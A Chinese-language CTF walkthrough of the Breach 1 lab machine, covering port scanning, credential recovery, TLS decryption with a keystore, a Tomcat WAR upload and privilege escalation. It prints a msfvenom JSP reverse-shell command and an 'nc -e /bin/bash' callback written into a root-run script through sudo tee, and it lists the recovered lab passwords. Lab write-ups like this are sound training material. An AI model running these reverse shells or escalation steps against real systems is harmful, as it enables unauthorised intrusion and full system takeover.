breach1靶机攻略
breach1
准备
这个靶机ip固定为 192.168.110.140
使用vmware的话,将它加入一张仅主机的网卡就行,比如vmnet7,然后vmnet设置成192.168.110.0网段,kali也新建一张网卡加入该网卡
扫描
nmap --min-rate 10000 -p- 192.168.110.140
快速扫描端口开放情况
会发现这个靶机全端口开放
渗透
访问80端口即页面试试
可以访问
主页的翻译
Initech被入侵,董事会投票决定引入内部的Initech网络咨询,LLP部门来协助。鉴于此次入侵事件的高知名度和几乎灾难性的损失,随后出现了许多针对该公司的攻击。Initech已经委托了他们的顶级顾问,由Bill Lumbergh, CISSP和Peter Gibbons, cb| EH, SEC+, NET+, A+领导,对漏洞进行控制和分析。
该公司几乎没有意识到,这次入侵并不是熟练的黑客所为,而是一名心怀不满的前雇员离职时留下的临别礼物。TOP咨询公司一直在努力遏制这一漏洞。然而,他们自己的职业道德和留下的烂摊子可能是公司垮台的原因。
f12查看源码
发现一条疑似密文的内容
Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo
拿去base64解码一下
pgibbons:damnitfeel$goodtobeagang$ta
得到内容疑似账号密码
除此之外,网页图片点击会跳转
第四个这里有登录框,同时能看到cms类型
拿刚才的账号密码试一下
登录成功
游荡到信息页,发现了提示
访问一下,下载了这个keystore文件,keystore是存储公私密钥的一种文件格式
接着游荡,此处点击content发现ssl相关的链接
点击即可下载
并且该句话提示所有ssl相关密码都为tomcat
使用wireshark查看一下流量包文件
wireshark _SSL_test_phase1.pcap
发现该流量包内容加密
某歌搜索一下keystore用法
修改一下参数
keytool -importkeystore -srckeystore keystore -destkeystore keystore.p12 -srcstoretype jks -deststoretype pkcs12
中间密码部分输入的都是tomcat
出现.p12后缀文件
使用wireshark打开刚才那个流量包
然后编辑-首选项
在protocols找到ssl或者tls
找到一个tls的看看端口多少
此处为8443
如图配置
文件选择刚生成的.p12文件
发现解密了,追踪一下tls的流
在请求信息中得到一串登录信息
tomcat:Tt\5D8F(#!*u=G)4m7zB
此处需要使用bp抓包然后勾选https请求,放包访问才能成功访问
随后登录框账户信息为刚才base64那一串,因为wireshark看到返回值是200
反复放包成功登录tomcat后台
使用msf生成一个war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.128 LPORT=4444 -f war > test.war
同样需要bp每一步https上传成功,msf打开监听,然后访问一下
msf监听到
python -c 'import pty;pty.spawn("/bin/bash")'
在var下发现两个php文件
是个配置文件,好像不用密码可以登录数据库
mysql用户表里有milton的登录信息
milton:6450d89bd3aff1d893b85d3ad65d2ec2
拿去md5解密
milton:thelaststraw
可以成功切换到milton用户
passwd文件可以看到能登录的用户有个bluebergh
并且备注提示bill lumbergh
在html里看到了bill这张图
python3 -m http.server 6789
下载图片字符串类型查看
strings bill.png
得到密码
blumbergh:coffeestains
提权
sudo -l查看权限操作
echo "nc -e /bin/bash 192.168.110.128 7989" > shell.txt
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
tidyup.sh只有root可写,但是可以以root身份执行tee,那就用tee写入反弹shell
过了一会成功获取root
